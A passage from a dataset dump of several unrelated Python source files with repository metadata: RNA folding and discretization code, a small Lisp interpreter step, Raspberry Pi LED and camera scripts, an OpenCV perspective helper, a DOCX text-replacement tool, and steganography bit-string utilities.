2**(dtype().nbytes*8) # highest number of bins encodable by dtype\n self.k = k\n self.L = L\n self.N = N\n self.dtype = dtype\n self.mode = mode\n \n if mode == 'gamma':\n import scipy.stats\n step = 1./self.n\n q = np.arange(0,1.+step,step) # n+1 \"percentiles\"\n params = OpenenDiscretization.opt_gamma_params[(L, k)]\n \n # compute optimal bin boundaries\n self.bins = scipy.stats.gamma.ppf(q, *params)\n \n # compute openen values that optimally represent each bin\n q_x = q[:-1] + 0.5*step\n self.x = np.array(scipy.stats.gamma.ppf(q_x, *params), dtype=np.float32)\n \n elif mode == 'linear':\n E_max = OpenenDiscretization.opt_E_max[(L, k)]\n step = E_max / self.n\n self.bins = np.arange(0, E_max + step, step, dtype=np.float32)\n self.bins[0] -= step\n self.x = 0.5*(self.bins[1:] + self.bins[:-1])\n else:\n raise ValueError(\"unknown discretization mode '{0}'\".format(mode))\n \n self.dx = self.bins[1:] - self.bins[:-1]\n\n def __str__(self):\n return \"OpenenDiscretization(L={self.L} k={self.k} dtype={self.dtype} mode={self.mode})\".format(self=self)\n\n @staticmethod\n def optimal_gamma_params_from_raw(openen, n_max=0):\n L = openen.rbns_reads.L\n k = openen.k\n import scipy.stats\n if n_max:\n data = openen.oem[:n_max]\n else:\n data = openen.oem\n opt = scipy.stats.gamma.fit(data)\n \n return (L,k),opt\n \n @staticmethod\n def from_filename(fname):\n import re\n M = re.search(r'discretized_(?P<mode>\\w+)_L(?P<L>\\d+)_k(?P<k>\\d+)_N(?P<N>\\d+)_(?P<dtype>\\w+)', fname)\n d = M.groupdict()\n L = int(d['L'])\n k = int(d['k'])\n N = int(d['N'])\n mode = d['mode']\n dtype_name = d['dtype']\n dtype = getattr(np, dtype_name)\n \n return OpenenDiscretization(k, L, dtype, mode=mode, N=N)\n \n def to_filename(self,N=0):\n if not N:\n N = self.N\n return \"discretized_{self.mode}_L{self.L}_k{self.k}_N{N}_{self.dtype.__name__}\".format(self = self, N=N)\n \n def discretize(self, data):\n #print \"data\", data.shape\n #print \"examples\", data[:10,:]\n #print \"minmax\", data.min(), data.max(), np.median(data), (1 - np.isfinite(data)).sum()\n #print \"issues\"\n #mask = (1 - np.isfinite(data))\n #print mask.sum()\n #x = mask.nonzero()\n #for i in x:\n #print i, data[i]\n \n #print \"bins\", self.bins\n #print \"dtype\", self.dtype\n \n #import RBPamp.digitize as cd\n #return cd.digitize(data, self.bins, dtype=self.dtype) - 1\n #return np.array(np.digitize(data, self.bins) - 1, dtype=self.dtype)\n \n res = cyska.digitize_32fp_8bit(data, self.bins) - 1\n return res\n \n \n\n def get_hist_xy(self, counts, normed=False):\n \"\"\"\n Takes a vector with bin-counts.\n Returns x and y coordinates that represent the underlying density \n (ready for plotting). If normed==True, the trapz integral is 1. \n If normed==False, the integral is counts.sum().\n \"\"\"\n y = counts/self.dx\n y /= np.trapz(y, self.x)\n\n if not normed:\n y *= counts.sum()\n\n return self.x, y\n \n\ninterrupt_folding = Event()\n\ndef interrupt():\n logger = logging.getLogger('fold.interrupt')\n interrupt_folding.set()\n if folding_in_progress:\n logger.warning(\"parallel folding run interrupted\")\n\n# Here come a couple of functions that allow parallel folding using the multiprocessing \n# module and RNAplfold\ndef queue_iter(queue, stop_item = None, interrupt_event=interrupt_folding):\n \"\"\"\n Small generator/wrapper around multiprocessing.Queue allowing simple\n for-loop semantics: \n \n for item in queue_iter(queue):\n ...\n\n \"\"\"\n while True:\n if interrupt_event.is_set():\n break\n \n item = queue.get()\n if item == stop_item:\n # signals end->exit\n break\n else:\n yield item\n\n\ndef seq_dispatcher(src, queue, chunk_size=100, max_depth=50, throttle_sleep=1., n_max=0, interrupt_event=interrupt_folding, **kwargs):\n \"\"\"\n Reads sequences from src and groups them in chunks of up to chunk_size.\n Each chunk is enumerated and the tuple (n_chunk, chunk) is pushed to the queue \n for processing. Avoids overly inflating the queue by sleeping if max_depth chunks are\n already queued.\n \"\"\"\n\n logger = logging.getLogger('fold.seq_dispatcher')\n chunk = []\n n_chunk = 0\n n_seqs = 0\n n_skipped = 0\n for read in src:\n read = read.upper()\n if 'N' in read:\n n_skipped += 1\n continue\n\n chunk.append( read )\n n_seqs += 1\n if len(chunk) >= chunk_size:\n # avoid overloading the queue\n while queue.qsize() > max_depth:\n #logger.debug('qsize > {0} -> sleeping for {1} second'.format(max_depth, throttle_sleep) )\n time.sleep(throttle_sleep)\n\n queue.put( (n_chunk, chunk) )\n n_chunk += 1\n chunk = []\n\n if n_max and n_seqs >= n_max:\n break\n\n if interrupt_event.is_set():\n logger.info('interrupted after {0} sequences dispatched ({2} skipped bc of non-ACGT letters) in {1} chunks. Removing unprocessed chunks from the queue.'.format(n_seqs, n_chunk, n_skipped) )\n while not queue.empty():\n queue.get(False)\n\n return\n \n if chunk:\n queue.put( (n_chunk, chunk) )\n n_chunk += 1\n\n logger.info('{0} sequences dispatched ({2} skipped bc of non-ACGT letters) in {1} chunks. Closing down.'.format(n_seqs, n_chunk, n_skipped) )\n\ndef fold_worker(seq_queue, data_queue, interrupt_event=interrupt_folding, **vienna_kwargs):\n \"\"\"\n Use a ViennaOpenen RNAplfold wrapper instance to compute open-energies for\n chunks of sequences from seq_queue. Results are also grouped into chunks and\n pushed (with the original chunk number) onto data_queue. This allows to order \n the chunks later and write the results in the same order as the original \n sequences.\n \"\"\"\n vienna = ViennaOpenen(**vienna_kwargs)\n for n_block, block in queue_iter(seq_queue, interrupt_event=interrupt_event):\n # received a chunk of sequences. Fold them en-bloc\n results = list(vienna.process_sequences(block))\n \n # and return results\n data_queue.put( (n_block, results) )\n \n # cleaning up\n vienna.close()\n\n\ndef result_collector(storage, res_queue, n_complete=0, n_left=-1, k_min=1, k_max=12, interrupt_event = interrupt_folding, log_address=\"\", log_format=\"\", **kwargs):\n \"\"\"\n Pops (n_chunk, results) from res_queue and inserts them into a heap\n (sorted on n_chunk). Keeping track of how many chunks were already passed on\n to storage, it uses the heap to make sure chunks are stored in the correct \n order and no chunk gets skipped.\n \"\"\"\n import heapq\n heap = []\n n_chunk_needed = 0\n t0 = time.time()\n t1 = t0\n n_rec = 0\n\n from RBPamp.zmq_logging import LoggerFactory\n zmq_logging = LoggerFactory(address=log_address, format_str=log_format)\n logger = zmq_logging.getLogger('fold.result_collector')\n\n if n_complete:\n storage.prepare_sinks(k_min, k_max, n_complete=n_complete)\n\n for n_chunk, results in queue_iter(res_queue, interrupt_event=interrupt_event):\n heapq.heappush(heap, (n_chunk, results) )\n \n # as long as the root of the heap is the next needed chunk\n # pass results on to storage\n while(heap and (heap[0][0] == n_chunk_needed)):\n n_chunk, results = heapq.heappop(heap) # retrieves heap[0]\n for krange, data in results:\n storage.write_set(krange, data)\n n_rec += 1\n \n n_chunk_needed += 1\n\n # debug output on average throughput\n t2 = time.time()\n if t2-t1 > 30:\n dT = t2 - t0\n rate = n_rec/dT\n \n n_remain = n_left - n_rec\n eta = n_remain / rate / 60 / 60\n logger.debug(\"processed {0} records in {1:.0f} seconds (average {2:.3f} records/second). ETA={3:.2f} hours\".format(n_rec, dT, rate, eta) )\n t1 = t2\n \n # by the time None pops from the queue, all chunks \n # should have been processed!\n if not interrupt_event.is_set():\n assert len(heap) == 0\n\n # close all open files and make sure stuff is on disk\n storage.close()\n dT = time.time() - t0\n logger.debug(\"finished processing {0} records in {1:.0f} seconds (average {2:.3f} records/second)\".format(n_rec, dT, n_rec/dT) )\n \n\ndef parallel_fold(reads, n_complete=0, n_parallel=8, skip_records=0, k_min=1, k_max=12, **kwargs):\n \"\"\"\n Top-level function for parallel folding. Constructs all the subprocesses\n and ensures proper shutdown. kwargs are passed to ViennaRNA instances, \n as well as the dispatcher.\n \"\"\"\n # This global variable is used by the keyboard interrupt \n # handler to decide if we need to flush stuff to disk\n global folding_in_progress\n folding_in_progress = True\n \n import multiprocessing\n seq_queue = multiprocessing.Queue()\n res_queue = multiprocessing.Queue()\n \n # fire up the dispatcher: \n #\n # seqs from src-> \n # enumerated chunks->\n # seq_queue\n #\n kwargs['interrupt_event'] = interrupt_folding\n kwargs['temp'] = reads.temp\n kwargs['adap5'] = reads.adap5\n kwargs['adap3'] = reads.adap3\n kwargs['l_insert'] = reads.L\n kwargs['k_min'] = k_min\n kwargs['k_max'] = k_max\n \n n_left = reads.N - n_complete\n kwargs['n_left'] = n_left\n kwargs['n_max'] = n_left\n kwargs['n_complete'] = n_complete\n\n dispatcher = multiprocessing.Process(\n target = seq_dispatcher, \n name='seq_dispatcher', \n args=(reads.iter_reads(n_skip=n_complete), seq_queue),\n kwargs=kwargs \n )\n dispatcher.daemon = True\n dispatcher.start()\n \n # fire up multiple workers: \n #\n # seq_queue-> enumerated seq. chunks-> \\\n # ViennaOpenen(RNAplfold_RBPamp)-> \\\n # enumerated result chunks-> res_queue\n #\n workers = []\n for n in range(n_parallel):\n worker = multiprocessing.Process(\n target = fold_worker, \n name='fold_worker_{0}'.format(n), \n args=(seq_queue, res_queue), \n kwargs=kwargs\n )\n worker.daemon = True\n worker.start()\n workers.append(worker)\n\n # fire up result collector:\n #\n # res_queue-> enumerated result chunks->\n # re-order->\n # write data using storage\n #\n collector = multiprocessing.Process(\n target = result_collector,\n name = 'result_collector',\n args = (reads.acc_storage, res_queue),\n kwargs = kwargs,\n )\n collector.daemon = True\n collector.start()\n \n # wait until all sequences have been thrown onto seq_queue\n dispatcher.join()\n # signal all fold-workers to finish\n for n in range(n_parallel):\n seq_queue.put(None) # each worker consumes exactly one None\n\n for worker in workers:\n # make sure all results are on res_queue by waiting for \n # workers to exit.\n worker.join()\n \n # signal the collector to stop\n res_queue.put(None)\n # and wait until everything has reached storage. \n # collector calls storage.close() bc it is in its own subprocess.\n collector.join()\n \n folding_in_progress = False\n \ndef test_discretization(N=10000):\n import matplotlib.pyplot as pp\n x = np.random.gamma(3, size=N)\n print(pp.hist(x, bins=100, normed=True))\n #print hcounts, hbins\n \n disc = OpenenDiscretization(3, 20, np.uint8, 'gamma')\n counts = np.bincount(disc.discretize(x), minlength=256)\n print(disc.x.shape, disc.dx.shape, counts)\n y = counts/disc.dx\n y *= counts.sum() / np.trapz(y, disc.x)\n\n print(np.trapz(y, disc.x), len(x))\n pp.plot(disc.x, y)\n \n pp.show()\n \ndef test_vienna():\n V = ViennaOpenen(k_min=5, k_max=5, l_insert = 40)\n seqs = [\n #'TATACACGCCAGGATGAGCATAGAATCCGCTATCTTTTTT',\n #'AACCGGCTAGTGTATCTAGAGTGGACCAATATTCTTTTGT',\n 'AATTATACCCAACACTTTTTTCCGCATCAAAGATATATAG',\n ]\n \n correct_data = [\n np.array([ 1.37758803e+00, 4.65885401e-02, 4.44491990e-02,\n 4.44544517e-02, 4.37189484e+00, 5.28840590e+00,\n 5.44863987e+00, 6.44182396e+00, 6.40045404e+00,\n 6.11836720e+00, 6.08953190e+00, 6.57561302e+00,\n 6.58033609e+00, 7.80855417e+00, 5.67592812e+00,\n 6.03012180e+00, 6.29798985e+00, 6.51980209e+00,\n 6.32596684e+00, 5.20592594e+00, 5.21245909e+00,\n 5.19603205e+00, 3.84870291e+00, 6.88292726e-04,\n 7.41391385e-04, 3.55043197e+00, 4.00692511e+00,\n 4.00891781e+00, 4.00772381e+00, 4.01971483e+00,\n 4.02041817e+00, 5.34093809e+00, 5.63969707e+00,\n 5.71804190e+00, 5.54887295e+00, 4.88211823e+00], dtype=np.float32\n ),\n np.array([ 1.21388996, 1.29570901, 3.08945203, 1.72082102, 1.58345401, \n 2.14634705, 2.86216402, 2.59196711, 2.52647901, 2.56132007, \n 0.1191803 , 2.34980106, 2.32055211, 2.19572902, 2.50372696, \n 2.59294009, 2.074687 , 3.11443305, 4.6174159 , 2.78021598, \n 2.777704 , 3.70185995, 3.6581161 , 1.99287498, 1.13532197,\n 1.26033103, 0.69037437, 0.70658243, 0.75592059, 0.71988487,\n 0.69261771, 0.07472514, 0.1399269 , 2.3060441 , 3.10272098,\n 2.76067591], dtype=np.float32),\n ]\n\n U5a = seqs[0].index('TTTTT')\n print(U5a)\n U5b = U5a + 1\n for kr, data in V.process_sequences(seqs):\n \n print(data[0][U5a], data[0][U5b])\n \n #for (krange, data), correct in zip(V.process_sequences(seqs), correct_data):\n #print data\n #assert (data == correct).all()\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG)\n #test_discretization()\n # test_vienna()\n # sys.exit(0)\n\n #src = file('/scratch/data/RBNS/RBFOX2/RBFOX2_input.reads') #.readlines()[:30051]\n #storage = OpenenStorage(path='tmp')\n #parallel_fold(src, storage, n_parallel=10)\n #sys.exit(1)\n\n #test_memory_consumption()\n\n from RBPamp.reads import RBNSReads\n reads = RBNSReads('/scratch2/RBNS/RBFOX2/RBFOX2_input.reads', n_max=10000)\n storage = reads.acc_storage.get_raw(1)\n print(storage.oem)\n sys.exit(0) \n \n dopenen = openen.discretize()\n for i in range(10):\n print(dopenen.rbns_reads.seqm[i])\n print(dopenen.oem[i])\n \n \n sys.exit(0)\n \n k8 = np.fromfile('openen.8.raw-float32.bin', dtype=np.float32)\n k7 = np.fromfile('openen.7.raw-float32.bin', dtype=np.float32)\n k6 = np.fromfile('openen.6.raw-float32.bin', dtype=np.float32)\n k5 = np.fromfile('openen.5.raw-float32.bin', dtype=np.float32)\n k4 = np.fromfile('openen.4.raw-float32.bin', dtype=np.float32)\n k3 = np.fromfile('openen.3.raw-float32.bin', dtype=np.float32)\n \n import matplotlib.pyplot as pp\n \n L=40\n k=7\n disc = OpenenDiscretization(7,40,np.uint8)\n print(disc.bins)\n mid = 0.5*(disc.bins[1:] + disc.bins[:-1])\n pp.loglog(mid, disc.x)\n pp.show()\n sys.exit(1)\n \n \n\n #dist = scipy.stats.beta # gamma\n dist = scipy.stats.gamma\n data = k8\n \n #params = dist.fit(data)\n #print params\n bins = gamma_bins_k(8,dtype=np.uint8)\n print(\"low bins\",bins[:10])\n print(\"low data\",sorted(data)[:10])\n print(\"low data->bins\", np.digitize(sorted(data)[:10], bins) - 1)\n \n dig = np.digitize(data, bins) -1\n \n print(dig.min(), dig.max())\n print(bins, np.bincount(dig))\n \n mid = 0.5*(bins[1:] + bins[:-1]) # mid-points\n print(len(bins))\n x = np.arange(0, data.max(), .01)\n #pp.hist(data, bins=bins, normed=True)\n #pp.plot(x, dist.pdf(x, *params))\n pp.loglog(data, mid[dig],'ob')\n \n RMSD = np.sqrt(np.mean((mid[dig] - data)**2))\n print(\"RMSD\",RMSD)\n pp.show()\n sys.exit(1)\n \n print(make_bins(5))\n src = open('/scratch/data/RBNS/RBFOX2/RBFOX2_input.reads')\n store = OpenenStorage()\n vienna = ViennaOpenen()\n\n import time\n t0 = time.time()\n for n, krange, data in vienna.process_sequences(src):\n #for n, krange, data in vienna_openen(src, L=64):\n store.store_set(krange, data)\n if n and not n % 1000:\n t1 = time.time()\n print(\"{0:.2f} seqs/second\".format(1000./(t1-t0)))\n t0 = t1\n \n #oa = OpenenHistCollection(name=sys.argv[1])\n \n #tm = ThreadManager(n_threads=4)\n #tm.process_reads(sys.stdin, oa)\n \n #print oa['TGCATGT']\n \n","repo_name":"RomoL2/RegVar","sub_path":"inst/extdata/RBPamp/RBPamp/fold.py","file_name":"fold.py","file_ext":"py","file_size_in_byte":40578,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"37993479609","text":"from reader import read_str\nfrom printer import pr_str\nfrom mal_types import MalException, Symbol\n\nrepl_env = {\n '+': lambda a, b: a+b,\n '-': lambda a, b: a-b,\n '*': lambda a, b: a*b,\n '/': lambda a, b: a/b\n }\n\n\ndef READ(source):\n return read_str(source)\n\n\ndef EVAL(ast, env):\n if not isinstance(ast, list):\n return eval_ast(ast, env)\n if isinstance(ast, list) and len(ast) == 0:\n return []\n if isinstance(ast, list):\n eval_list = eval_ast(ast, env)\n function = eval_list[0]\n return function(*eval_list[1:])\n\n\ndef PRINT(exp):\n return pr_str(exp)\n\n\ndef REP(source):\n return PRINT(EVAL(READ(source), repl_env))\n\n\ndef eval_ast(ast, env):\n if isinstance(ast, Symbol):\n out = env.get(str(ast))\n if out is None:\n raise MalException(\"symbol not found\")\n else:\n return out\n if isinstance(ast, list):\n if len(ast) == 0:\n return []\n else:\n out = list()\n for x in ast:\n out.append(EVAL(x, env))\n return out\n return ast\n\n\nif __name__ == '__main__':\n header = \"mal START\"\n footer = \"mal END\"\n print(header)\n try:\n while True:\n try:\n data = input('>>')\n print(REP(data))\n except MalException as m:\n print(str(m))\n except (EOFError, KeyboardInterrupt):\n pass\n print(footer)\n","repo_name":"xxmatxx/mal","sub_path":"python/step2_eval.py","file_name":"step2_eval.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29016570495","text":"#Simple testing on GrovePi\n#with two led lights, Blue led on Digitial Port 3\n#Red led on Digital Port 2\n#\n#\n#Author: Alexander Bradshaw\n\nimport time\nimport sys\nfrom grovepi import*\n\n#Initializes ports and pinMode for each of the led lights\nled1 = 3\npinMode(led1, \"OUTPUT\")\n#time.sleep(.5)\n\nled2 = 2\npinMode(led2, \"OUTPUT\")\n#time.sleep(.5)\n\n\n#Alternates between turning on the blue led and red led\n\nwhile True:\n try:\n digitalWrite(led1,1)\n digitalWrite(led2,0)\n print(\"Blue Light is on!\")\n time.sleep(1)\n digitalWrite(led1,0)\n digitalWrite(led2,1)\n print(\"Red light is on\")\n time.sleep(1)\n\n except KeyboardInterrupt:\n digitalWrite(led1,0)\n digitalWrite(led2,0)\n sys.exit()\n except IOError:\n print(\"Error\")\n","repo_name":"bradshaw13/AutonomousRobot","sub_path":"simpleled.py","file_name":"simpleled.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2423496807","text":"import cv2\nimport numpy as np\nimport tkinter\nimport matplotlib.pyplot as plt\nimport math\n\n\n#Imports image,contour,and the final size of the perspective correction\n#Exports the perspective corrected image\ndef perspective_trapezoid_to_rect(imgBGR,rectContour,finalSize,mask=None):\n\n imgROI = cv2.bitwise_and(imgBGR,imgBGR,mask=mask)\n\n #Get the corner points (extreme points) of the contour\n leftmost = tuple(rectContour[rectContour[:,:,0].argmin()][0])\n rightmost = tuple(rectContour[rectContour[:,:,0].argmax()][0])\n topmost = tuple(rectContour[rectContour[:,:,1].argmin()][0])\n bottommost = tuple(rectContour[rectContour[:,:,1].argmax()][0])\n\n fromPoints = np.float32([[bottommost[0],bottommost[1]],\n [leftmost[0],leftmost[1]],\n [topmost[0],topmost[1]],\n [rightmost[0],rightmost[1]]])\n\n toPoints = np.float32([[finalSize[0]/2,finalSize[1]],\n [0,finalSize[1]/2],\n [finalSize[0]/2,0],\n [finalSize[0],finalSize[1]/2]])\n\n #Peform the perspective correction\n M = cv2.getPerspectiveTransform(fromPoints,toPoints)\n des = cv2.warpPerspective(imgROI,M,finalSize)\n\n return des\n\n#Import an image and values to translate in the x or y direction\n#Export translated image\ndef translate(img,dx,dy,shape):\n M = np.float32([[1,0,dx],[0,1,dy]])\n dst = cv2.warpAffine(img,M,(shape[1],shape[0]))\n\n return dst\n","repo_name":"Snipesengan/MP_ASSIGNMENT","sub_path":"src/HLD_Transform.py","file_name":"HLD_Transform.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71686188854","text":"import RPi.GPIO as gp\nimport os\nfrom picamera import PiCamera\nfrom picamera.array import PiRGBArray\nfrom time import sleep\nimport cv2\nimport numpy as np\nimport time\n\ngp.setwarnings(False)\ngp.setmode(gp.BOARD)\n\ngp.setup(7, gp.OUT)\ngp.setup(11, gp.OUT)\ngp.setup(12, gp.OUT)\n\ngp.setup(15, gp.OUT)\ngp.setup(16, gp.OUT)\ngp.setup(21, gp.OUT)\ngp.setup(22, gp.OUT)\n\ngp.output(11, True)\ngp.output(12, True)\ngp.output(15, True)\ngp.output(16, True)\ngp.output(21, True)\ngp.output(22, True)\n\nprint('Starting the Calibration just press the space bar to exit this part of the Programm\\n')\nprint('Push (s) to save the image you want and push (c) to see next frame without saving the image')\n\ni=0\n\ncamera = PiCamera()\ncamera.resolution = (2560, 720)\nrawCapture = PiRGBArray(camera)\n\nsleep(2)\nk=0\nwhile True:\n\t# take an image from channel 1\n\t# Start Reading Camera images\n\tgp.output(7, False)\n\tgp.output(11, False)\n\tgp.output(12, True)\n\ttime.sleep(0.1)\n\tcamera.capture(rawCapture, format=\"bgr\")\n\tframeR = rawCapture.array\n\trawCapture.truncate(0)\n\tgp.output(7, False)\n\tgp.output(11, True)\n\tgp.output(12, False)\n\ttime.sleep(0.1)\n\tcamera.capture(rawCapture, format=\"bgr\")\n\tframeL = rawCapture.array\n\trawCapture.truncate(0)\n\n\tcv2.imshow('imgR',frameR)\n\tcv2.imshow('imgL',frameL)\n\tcv2.waitKey(10)\n\t\n\tyn = raw_input('Save the image? y/n ')\n\tif yn == 'y':\n\t\tt= str(i)\n\t\tprint('Saved'+t)\n\t\tcv2.imwrite('test-R'+t+'.png',frameR) # Save the image in the file where this Programm is located\n\t\tcv2.imwrite('test-L'+t+'.png',frameL)\n\t\ti=i+1\n\telse:\n\t\tprint('canceled')\n\t\n\t\n\n\n\n\n","repo_name":"amisal88/EVC-G3","sub_path":"SLAM/test_colors.py","file_name":"test_colors.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4965931381","text":"#!/usr/bin/env python3\n\nimport json\nimport argparse\nimport tempfile\nimport os\nimport pyperclip\nimport sys\nimport subprocess\nimport re\nimport shutil\nimport xml.sax.saxutils\nfrom pathlib import Path\nfrom os import listdir\nfrom os.path import isfile\nfrom datetime import datetime\n\nif shutil.which('zip') is None:\n raise Exception('zip command not found')\nif shutil.which('unzip') is None:\n raise Exception('unzip command not found')\nparser = argparse.ArgumentParser()\nparser.add_argument('docxfile')\n#parser.add_argument('--old', help='Old text', required=True)\nparser.add_argument('--old', help='Old text to be replaced with clipboard text')\nparser.add_argument('--rep', help='Replacement JSON file mapping to file paths')\nparser.add_argument('--rep-json', help='Replacement JSON file')\nparser.add_argument('--replace-whitespace-with-space', help='Replace whitespace with space', action='store_true')\nparser.add_argument('--generate-pdf', help='Additional PDF generation', action='store_true')\nparser.add_argument('--generate-pdf-with-pandoc', help='Additional PDF generation with pandoc', action='store_true')\nparser.add_argument('--get-pdf-num-of-pages', help='Print PDF number of pages', action='store_true')\nparser.add_argument('--keep-temp-files', help='End the program without deleting temp files', action='store_true')\nnmsce: argparse.Namespace = parser.parse_args()\nrep: str = nmsce.rep\nrep_json: str = nmsce.rep_json\npattern: str = nmsce.old\nreplace_whitespace_with_space: bool = nmsce.replace_whitespace_with_space\ngenerate_pdf: bool = nmsce.generate_pdf\ngenerate_pdf_with_pandoc: bool = nmsce.generate_pdf_with_pandoc\nget_pdf_num_of_pages: bool = nmsce.get_pdf_num_of_pages\nkeep_temp_files: bool = nmsce.keep_temp_files\ndoc_filename: str = nmsce.docxfile\n#print(nmsce)\nif rep is None and rep_json is None and pattern is None:\n raise Exception('At least one option among --rep, --old, and --rep-json need to be specified')\ntmpdir: str = tempfile.gettempdir()\ntmpdir = os.path.join(tmpdir, 'REPLACE_DOCX_TEXT_TMPDIR')\n\n\nif os.path.lexists(tmpdir):\n shutil.rmtree(tmpdir)\nos.makedirs(tmpdir)\ntmpdoc = os.path.join(tmpdir, 'tmp.docx')\ndocxml = os.path.join(tmpdir, 'word/document.xml')\n#if 2!=len(sys.argv):\n# raise Exception('Must provide exactly 1 arg as DOCX filename')\n#scr_filename: str = sys.argv[0]\n#doc_filename: str = sys.argv[1]\nif not doc_filename.lower().endswith('.docx'):\n raise Exception('DOCX filename not ending with .docx')\nif not os.path.isfile(doc_filename):\n raise Exception('DOCX filename not an existing file')\n#pattern: str | None = os.getenv('REPLACE_DOCX_TEXT_OLD')\n#if pattern is None:\n# raise Exception('REPLACE_DOCX_TEXT_OLD not found. Environment variable REPLACE_DOCX_TEXT_OLD is required.')\nshutil.copy2(doc_filename, tmpdoc)\nsubprocess.run(['unzip', 'tmp.docx'], cwd=tmpdir, check=True)\nif not os.path.isfile(docxml):\n raise Exception('xml containing text is somehow missing')\ndocxmlpath: Path = Path(docxml)\ndocxmlstr = docxmlpath.read_text()\n\n\nif pattern:\n print('OLD:', pattern)\n substitution: str = pyperclip.paste()\n #if 'true' == os.getenv('REPLACE_DOCX_TEXT_REPLACE_WHITESPACE_WITH_SPACE'):\n if replace_whitespace_with_space:\n substitution = re.sub('\\\\s+', ' ', substitution)\n substitution = xml.sax.saxutils.escape(substitution)\n print('NEW:', substitution)\n docxmlstr = docxmlstr.replace(pattern, substitution)\nif rep_json:\n rep_lst = json.loads(Path(rep_json).read_text())\n for reobj in rep_lst:\n if 'old' in reobj and 'new' in reobj:\n nstr: str = reobj['new']\n print('OLD:', reobj['old'])\n print('NEW:', reobj['new'])\n nstr = xml.sax.saxutils.escape(nstr)\n if 'count' in reobj:\n docxmlstr = docxmlstr.replace(reobj['old'], nstr, reobj['count'])\n else:\n docxmlstr = docxmlstr.replace(reobj['old'], nstr)\nif rep:\n rep_lst = json.loads(Path(rep).read_text())\n for reobj in rep_lst:\n if 'old' in reobj and 'new' in reobj:\n print('OLD:', reobj['old'])\n print('NEW:', reobj['new'])\n nstr: str = Path(reobj['new']).read_text()\n nstr = xml.sax.saxutils.escape(nstr)\n if 'count' in reobj:\n docxmlstr = docxmlstr.replace(reobj['old'], nstr, reobj['count'])\n else:\n docxmlstr = docxmlstr.replace(reobj['old'], nstr)\n\ndocxmlpath.write_text(docxmlstr)\nsubprocess.run(['zip', '-f', 'tmp.docx'], cwd=tmpdir, check=True)\nnewdocx = doc_filename[:-5]+'_new.docx'\nprint('New DOCX:', newdocx)\nshutil.copy2(tmpdoc, newdocx)\nif not keep_temp_files:\n shutil.rmtree(tmpdir)\n#if 'true' == os.getenv('REPLACE_DOCX_TEXT_CONVERT_TO_PDF'):\nif generate_pdf:\n if generate_pdf_with_pandoc and shutil.which('pandoc') and shutil.which('pdflatex'):\n subprocess.run(['pandoc', '-o', newdocx[:-5]+'.pdf', '-f', 'docx', newdocx], check=True, cwd=(os.path.dirname(newdocx) or None))\n elif shutil.which('libreoffice') is None:\n print('libreoffice not found. PDF not generated.')\n else:\n subprocess.run(['libreoffice', '--headless', '--convert-to', 'pdf', newdocx], check=True, cwd=(os.path.dirname(newdocx) or None))\n dst: str = shutil.move(newdocx[:-5]+'.pdf', doc_filename[:-5]+'.pdf')\n if get_pdf_num_of_pages and shutil.which('pdfinfo'):\n subprocess.run('pdfinfo '+dst+' | grep -- ^Pages', shell=True, check=True)#fixme if dst contains special character this will fail\n#print('DONE')\n","repo_name":"cshu/replace-docx-text","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71173836854","text":"#filemanip.py\nimport numpy as np\nfrom graycode import *\n\n## Methods for converting files to binary arrays and their inverse\n\n# Methods to convert to binary\ndef messageToBinString(message): #May need a string builder, be careful\n\t'''\n\tConvert a string of characters to a binary string\n\t'''\n\ts = \"\"\n\tfor i in range (len(message)):\n\t\ts+=char_to_binary(message[i])\n\treturn s\n\ndef pad(bin_string): #Concatenation again\n\t'''\n\tPad a binary string using #PKCS\n\t'''\n\tpad_required = (64 - len(bin_string) % 64) / 8 \n\tfor i in range(pad_required):\n\t\tbin_string = '{0:08b}'.format(pad_required) + bin_string\n\treturn bin_string\n\ndef char_to_binary(char):\n\t'''\n\tConvert char to binary\n\t'''\n\tx = ord(char)\n\treturn '{0:08b}'.format(x)\n\ndef unpad(bin_string):\n\t'''\n\tUnpad a binary string using #PKCS\n\t'''\n\tpad_count = int(bin_string[0:8],2)\n\t#check padding\n\tfor x in xrange(0, pad_count*8, 8):\n\t\tif(bin_string[x:x+8] != bin_string[0:8]):\n\t\t\treturn bin_string\n\treturn bin_string[pad_count*8: len(bin_string)]\n\ndef binStringtoSquares(bin_string):\n\t'''\n\tConvert binary string into a (8,8,X) matrix\n\t'''\n\tnum_squares = len(bin_string)/64\n\toutput_array = np.zeros((8,8,num_squares), dtype = 'uint8')\n\tcounter = 0\n\tfor i in range (8):\n\t\tfor j in range (8):\n\t\t\tfor k in range (num_squares):\n\t\t\t\toutput_array[i,j,k] = bin_string[counter]\n\t\t\t\tcounter+= 1\n\treturn output_array\n\n# Methods for converting from binary to characters\n\ndef bin_to_char(a):\n\t'''\n\tConvert binary string to character\n\t'''\n\tx=int(a,2)\n\treturn chr(x)\n\ndef binStringtoFile(bin_string):\n\t'''\n\tConvert binary string to character string\n\t'''\n\tbin_string_holder = \"\"\n\tfile = \"\"\n\tfor i in range (len(bin_string)):\n\t\tbin_string_holder += bin_string[i]\n\t\tif((i+1)%8 == 0):\n\t\t\tfile += bin_to_char(bin_string_holder)\n\t\t\tbin_string_holder = \"\"\n\treturn str(file)\n\ndef convert_array_to_bin_string(array):\n\t'''\n\tConvert array to bin strings\n\t'''\n\tbin_string = \"\"\n\tfor i in range (8):\n\t\tfor j in range (8):\n\t\t\tfor k in range (len(array[0,0])): \n\t\t\t\tbin_string += str(array[i,j,k])\n\treturn bin_string","repo_name":"CurtisSHiscock/Bit-Plane-Complexity-Segmentation-Steganography","sub_path":"libs/filemanip.py","file_name":"filemanip.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} 